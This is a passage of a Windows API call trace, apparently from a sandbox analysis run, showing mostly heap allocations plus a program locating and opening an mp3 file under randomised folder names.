0x43e2640 [0117.079] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2640 | out: hHeap=0x1780000) returned 1 [0117.079] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca580 [0117.079] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x140) returned 0x43cc1c8 [0117.079] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x41a49d0 | out: hHeap=0x1780000) returned 1 [0117.079] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca580 | out: hHeap=0x1780000) returned 1 [0117.079] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1796ee8 | out: hHeap=0x1780000) returned 1 [0117.079] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2620 | out: hHeap=0x1780000) returned 1 [0117.079] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25e0 | out: hHeap=0x1780000) returned 1 [0117.079] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43ca760 [0117.079] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf8d8 [0117.079] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca508 [0117.079] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e26c0 [0117.079] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca6b8 [0117.079] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca538 [0117.079] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x40) returned 0x43a8b58 [0117.080] PeekMessageW (in: lpMsg=0x144ee2c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144ee2c) returned 0 [0117.080] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e26e0 [0117.080] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2540 [0117.080] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x18) returned 0x1796e88 [0117.080] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1796e88 | out: hHeap=0x1780000) returned 1 [0117.080] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2540 | out: hHeap=0x1780000) returned 1 [0117.080] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e26e0 | out: hHeap=0x1780000) returned 1 [0117.080] PeekMessageW (in: lpMsg=0x144ee2c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144ee2c) returned 0 [0117.080] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e26e0 [0117.080] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfce8 [0117.080] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca748 [0117.080] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e26f0 [0117.080] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca580 [0117.080] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e26f0 | out: hHeap=0x1780000) returned 1 [0117.080] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\Music\\RjvHKIDt9\\evi6Nl1 g1KyY\\-a1fx91SeT 48T\\ssO YlBHXom4.mp3", lpFindFileData=0x144e970 | out: lpFindFileData=0x144e970*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x7ab12ae0, ftCreationTime.dwHighDateTime=0x1d5efe8, ftLastAccessTime.dwLowDateTime=0xb730d540, ftLastAccessTime.dwHighDateTime=0x1d5e103, ftLastWriteTime.dwLowDateTime=0xb730d540, ftLastWriteTime.dwHighDateTime=0x1d5e103, nFileSizeHigh=0x0, nFileSizeLow=0x12108, dwReserved0=0x10189fc, dwReserved1=0x8, cFileName="ssO YlBHXom4.mp3", cAlternateFileName="SSOYLB~1.MP3")) returned 0x41ac540 [0117.080] FindClose (in: hFindFile=0x41ac540 | out: hFindFile=0x41ac540) returned 1 [0117.080] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca580 | out: hHeap=0x1780000) returned 1 [0117.080] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca748 | out: hHeap=0x1780000) returned 1 [0117.080] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfce8 | out: hHeap=0x1780000) returned 1 [0117.080] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2640 [0117.081] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x18) returned 0x1796ec8 [0117.081] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e25e0 [0117.081] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x30) returned 0x4391e00 [0117.081] CharUpperBuffW (in: lpsz="_WINAPI_FILEINUSE", cchLength=0x11 | out: lpsz="_WINAPI_FILEINUSE") returned 0x11 [0117.081] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x4391e00 | out: hHeap=0x1780000) returned 1 [0117.081] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25e0 | out: hHeap=0x1780000) returned 1 [0117.081] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfce8 [0117.081] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x1) returned 0x43e2540 [0117.081] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf860 [0117.081] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca6e8 [0117.081] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e25a0 [0117.081] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca700 [0117.081] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25a0 | out: hHeap=0x1780000) returned 1 [0117.081] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43ca580 [0117.081] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfe78 [0117.081] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca718 [0117.081] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e25e0 [0117.081] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca718 | out: hHeap=0x1780000) returned 1 [0117.081] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43d0058 [0117.081] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca598 [0117.081] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca5c8 [0117.081] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x40) returned 0x43a92a8 [0117.081] PeekMessageW (in: lpMsg=0x144ea0c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144ea0c) returned 0 [0117.082] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfdd8 [0117.082] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca718 [0117.082] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2620 [0117.082] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca658 [0117.082] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca5e0 [0117.082] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e26f0 [0117.082] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca5e0 | out: hHeap=0x1780000) returned 1 [0117.082] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2700 [0117.082] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x30) returned 0x4391c78 [0117.082] CharUpperBuffW (in: lpsz="_WINAPI_CREATEFILEEX", cchLength=0x14 | out: lpsz="_WINAPI_CREATEFILEEX") returned 0x14 [0117.082] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x4391c78 | out: hHeap=0x1780000) returned 1 [0117.082] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2700 | out: hHeap=0x1780000) returned 1 [0117.082] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfef0 [0117.082] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x1) returned 0x43e2700 [0117.082] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43d0080 [0117.082] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca748 [0117.082] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2720 [0117.082] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca5e0 [0117.082] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2720 | out: hHeap=0x1780000) returned 1 [0117.082] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x1) returned 0x43e2550 [0117.082] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca8b0 [0117.082] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2570 [0117.082] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2570 | out: hHeap=0x1780000) returned 1 [0117.082] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x1) returned 0x43e2720 [0117.082] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca9e8 [0117.082] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2570 [0117.083] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2570 | out: hHeap=0x1780000) returned 1 [0117.083] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43caa30 [0117.083] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cffb8 [0117.083] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca7a8 [0117.083] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2570 [0117.083] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca7a8 | out: hHeap=0x1780000) returned 1 [0117.083] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43d0148 [0117.083] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca868 [0117.083] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca958 [0117.083] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43d0170 [0117.083] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caa48 [0117.083] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e25a0 [0117.083] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caa48 | out: hHeap=0x1780000) returned 1 [0117.083] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cff18 [0117.083] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca898 [0117.083] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfdb0 [0117.083] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca8c8 [0117.083] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2580 [0117.083] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca850 [0117.083] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e25b0 [0117.083] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25b0 | out: hHeap=0x1780000) returned 1 [0117.083] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cff40 [0117.083] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca880 [0117.083] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e25b0 [0117.083] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca910 [0117.083] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2870 [0117.083] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2870 | out: hHeap=0x1780000) returned 1 [0117.083] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43d01e8 [0117.084] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca928 [0117.084] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2860 [0117.084] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca928 | out: hHeap=0x1780000) returned 1 [0117.084] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x30) returned 0x4391b98 [0117.084] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca808 [0117.084] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2770 [0117.084] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2770 | out: hHeap=0x1780000) returned 1 [0117.084] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfe28 [0117.084] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caa48 [0117.084] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2910 [0117.084] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caa48 | out: hHeap=0x1780000) returned 1 [0117.084] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfea0 [0117.084] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca928 [0117.084] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2800 [0117.084] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2800 | out: hHeap=0x1780000) returned 1 [0117.084] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfe00 [0117.084] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca8e0 [0117.084] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e28a0 [0117.084] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca8e0 | out: hHeap=0x1780000) returned 1 [0117.084] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cff90 [0117.084] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca8e0 [0117.084] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x40) returned 0x43a8be8 [0117.084] PeekMessageW (in: lpMsg=0x144e4f4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144e4f4) returned 0 [0117.084] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43d0030 [0117.084] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caa48 [0117.085] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca9a0 | out: hHeap=0x1780000) returned 1 [0117.085] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e27d0 | out: hHeap=0x1780000) returned 1 [0117.085] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2870 | out: hHeap=0x1780000) returned 1 [0117.085] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2880 | out: hHeap=0x1780000) returned 1 [0117.085] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2870 | out: hHeap=0x1780000) returned 1 [0117.085] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2790 | out: hHeap=0x1780000) returned 1 [0117.085] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2870 | out: hHeap=0x1780000) returned 1 [0117.085] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2870 | out: hHeap=0x1780000) returned 1 [0117.085] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2810 | out: hHeap=0x1780000) returned 1 [0117.085] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43d0198 | out: hHeap=0x1780000) returned 1 [0117.085] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e28c0 | out: hHeap=0x1780000) returned 1 [0117.085] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2870 | out: hHeap=0x1780000) returned 1 [0117.085] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e28c0 | out: hHeap=0x1780000) returned 1 [0117.085] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2790 | out: hHeap=0x1780000) returned 1 [0117.085] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e27f0 | out: hHeap=0x1780000) returned 1 [0117.085] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2870 | out: hHeap=0x1780000) returned 1 [0117.085] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e27c0 | out: hHeap=0x1780000) returned 1 [0117.085] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e27c0 | out: hHeap=0x1780000) returned 1 [0117.085] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43a8c30 | out: hHeap=0x1780000) returned 1 [0117.085] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2740 | out: hHeap=0x1780000) returned 1 [0117.085] CharLowerBuffW (in: lpsz="handle", cchLength=0x6 | out: lpsz="handle") returned 0x6 [0117.086] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caca0 | out: hHeap=0x1780000) returned 1 [0117.086] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e28f0 | out: hHeap=0x1780000) returned 1 [0117.086] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cabf8 | out: hHeap=0x1780000) returned 1 [0117.086] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2760 | out: hHeap=0x1780000) returned 1 [0117.086] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cabf8 | out: hHeap=0x1780000) returned 1 [0117.086] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2870 | out: hHeap=0x1780000) returned 1 [0117.086] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caca0 | out: hHeap=0x1780000) returned 1 [0117.086] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2810 | out: hHeap=0x1780000) returned 1 [0117.086] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cabf8 | out: hHeap=0x1780000) returned 1 [0117.086] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2820 | out: hHeap=0x1780000) returned 1 [0117.086] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caca0 | out: hHeap=0x1780000) returned 1 [0117.086] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2870 | out: hHeap=0x1780000) returned 1 [0117.086] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caca0 | out: hHeap=0x1780000) returned 1 [0117.086] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e28c0 | out: hHeap=0x1780000) returned 1 [0117.086] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caac0 | out: hHeap=0x1780000) returned 1 [0117.086] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e28e0 | out: hHeap=0x1780000) returned 1 [0117.086] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caaa8 | out: hHeap=0x1780000) returned 1 [0117.086] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2920 | out: hHeap=0x1780000) returned 1 [0117.086] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cad48 | out: hHeap=0x1780000) returned 1 [0117.086] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2730 | out: hHeap=0x1780000) returned 1 [0117.086] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cabf8 | out: hHeap=0x1780000) returned 1 [0117.086] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e28c0 | out: hHeap=0x1780000) returned 1 [0117.086] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caca0 | out: hHeap=0x1780000) returned 1 [0117.086] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e27c0 | out: hHeap=0x1780000) returned 1 [0117.086] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cabf8 | out: hHeap=0x1780000) returned 1 [0117.086] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2920 | out: hHeap=0x1780000) returned 1 [0117.086] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caca0 | out: hHeap=0x1780000) returned 1 [0117.086] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2740 | out: hHeap=0x1780000) returned 1 [0117.086] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cabf8 | out: hHeap=0x1780000) returned 1 [0117.086] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e27c0 | out: hHeap=0x1780000) returned 1 [0117.087] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caca0 | out: hHeap=0x1780000) returned 1 [0117.087] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2880 | out: hHeap=0x1780000) returned 1 [0117.087] LoadLibraryW (lpLibFileName="kernel32.dll") returned 0x772d0000 [0117.087] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CreateFileW", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0117.087] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CreateFileW", cchWideChar=12, lpMultiByteStr=0x43cacb8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CreateFileW", lpUsedDefaultChar=0x0) returned 12 [0117.087] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cacb8 | out: hHeap=0x1780000) returned 1 [0117.087] GetProcAddress (hModule=0x772d0000, lpProcName="CreateFileW") returned 0x7733ed10 [0117.087] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caca0 | out: hHeap=0x1780000) returned 1 [0117.087] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2750 | out: hHeap=0x1780000) returned 1 [0117.087] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2880 | out: hHeap=0x1780000) returned 1 [0117.087] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2890 | out: hHeap=0x1780000) returned 1 [0117.087] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e28c0 | out: hHeap=0x1780000) returned 1 [0117.087] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e28e0 | out: hHeap=0x1780000) returned 1 [0117.087] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e27c0 | out: hHeap=0x1780000) returned 1 [0117.087] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e28f0 | out: hHeap=0x1780000) returned 1 [0117.087] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2900 | out: hHeap=0x1780000) returned 1 [0117.087] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43d00d0 | out: hHeap=0x1780000) returned 1 [0117.087] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\Music\\RjvHKIDt9\\evi6Nl1 g1KyY\\-a1fx91SeT 48T\\ssO YlBHXom4.mp3" (normalized: "c:\\users\\fd1hvy\\music\\rjvhkidt9\\evi6nl1 g1kyy\\-a1fx91set 48t\\sso ylbhxom4.mp3"), dwDesiredAccess=0x80000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x258 [0117.088] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cabf8 | out: hHeap=0x1780000) returned 1 [0117.088] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2770 | out: hHeap=0x1780000) returned 1 [0117.088] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cacd0 | out: hHeap=0x1780000) returned 1 [0117.088] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caac0 | out: hHeap=0x1780000) returned 1 [0117.088] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x4506008 | out: hHeap=0x1780000) returned 1 [0117.088] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cabf8 | out: hHeap=0x1780000) returned 1 [0117.088] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2880 | out: hHeap=0x1780000) returned 1 [0117.088] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cacb8 | out: hHeap=0x1780000) returned 1 [0117.088] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cabf8 | out: hHeap=0x1780000) returned 1 [0117.088] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2880 | out: hHeap=0x1780000) returned 1 [0117.088] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cace8 | out: hHeap=0x1780000) returned 1 [0117.088] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cace8 | out: hHeap=0x1780000) returned 1 [0117.088] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e28f0 | out: hHeap=0x1780000) returned 1 [0117.088] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cacd0 | out: hHeap=0x1780000) returned 1 [0117.088] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cad00 | out: hHeap=0x1780000) returned 1 [0117.088] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2880 | out: hHeap=0x1780000) returned 1 [0117.088] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cace8 | out: hHeap=0x1780000) returned 1 [0117.088] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cad18 | out: hHeap=0x1780000) returned 1 [0117.088] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2880 | out: hHeap=0x1780000) returned 1 [0117.088] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cad00 | out: hHeap=0x1780000) returned 1 [0117.088] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cad30 | out: hHeap=0x1780000) returned 1 [0117.088] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e28f0 | out: hHeap=0x1780000) returned 1 [0117.088] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cad18 | out: hHeap=0x1780000) returned 1 [0117.088] FreeLibrary 